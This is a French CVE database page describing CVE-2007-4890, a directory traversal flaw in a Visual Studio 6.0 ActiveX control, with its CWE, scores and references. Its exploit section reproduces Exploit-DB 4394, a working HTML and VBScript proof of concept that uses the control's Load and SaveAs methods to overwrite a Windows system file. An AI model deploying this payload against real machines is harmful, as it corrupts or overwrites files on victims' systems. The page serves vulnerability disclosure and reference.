CVE-2007-4890 : Détail

CVE-2007-4890

Directory Traversal
A01-Broken Access Control
4.35%V3
Network
2007-09-13
23h00 +00:00
2017-09-28
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Absolute directory traversal vulnerability in a certain ActiveX control in the VB To VSI Support Library (VBTOVSI.DLL) 1.0.0.0 in Microsoft Visual Studio 6.0 allows remote attackers to create or overwrite arbitrary files via a full pathname in the argument to the SaveAs method. NOTE: contents can be copied from local files via the Load method.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5.8 AV:N/AC:M/Au:N/C:N/I:P/A:P [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 4394

Date de publication : 2007-09-10 22h00 +00:00
Auteur : shinnai
EDB Vérifié : Yes

<pre> <code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">--------------------------------------------------------------------------------------------------------- <b>Microsoft Visual Studio 6.0 VB To VSI Support Library (VBTOVSI.DLL v. 1.0.0.0) Arbitrary File Overwrite</b> url: http://www.microsoft.com author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org This was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage. Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 <b>Description: Using the "Load()" method we can load the content of a file from local machine passed as argument to this function and then save it into arbitrary location with the "SaveAs()" method. This allow to overwrite well known files with arbitrary data. I try to pass to the "Load()" method remote directories (http) but, unfortunately, it accepts only local directories.</b> --------------------------------------------------------------------------------------------------------- <object classid='clsid:7EEA39E3-41D1-11D2-AB3B-00AA00BDD685' id='test'></object> <input language=VBScript onclick=tryMe() type=button value="Click here to start the test"> <script language = 'vbscript'> Sub tryMe() test.Load "c:\windows\system32\cmd.exe" 'or just some existing file test.SaveAs "c:\windows\system_.ini" MsgBox "Exploit completed!" End Sub </script> </span></span> </code></pre> # milw0rm.com [2007-09-11]

Products Mentioned

Configuraton 0

Microsoft>>Visual_studio >> Version 6.0

Références

https://www.exploit-db.com/exploits/4394
Tags : exploit, x_refsource_EXPLOIT-DB
http://secunia.com/advisories/26779
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/25635
Tags : vdb-entry, x_refsource_BID